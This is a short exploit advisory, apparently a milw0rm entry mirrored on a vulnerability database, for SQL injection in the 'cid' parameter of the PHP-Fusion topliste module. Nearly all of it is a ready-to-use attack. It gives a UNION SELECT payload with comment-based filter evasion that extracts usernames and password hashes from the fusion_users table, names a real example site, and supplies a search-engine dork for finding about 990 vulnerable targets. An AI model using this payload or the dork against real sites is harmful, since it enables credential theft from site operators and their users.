PHP-Fusion Module topliste 1.0 - cid SQL Injection vulnerability on xoron.bi
--------------------------------
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo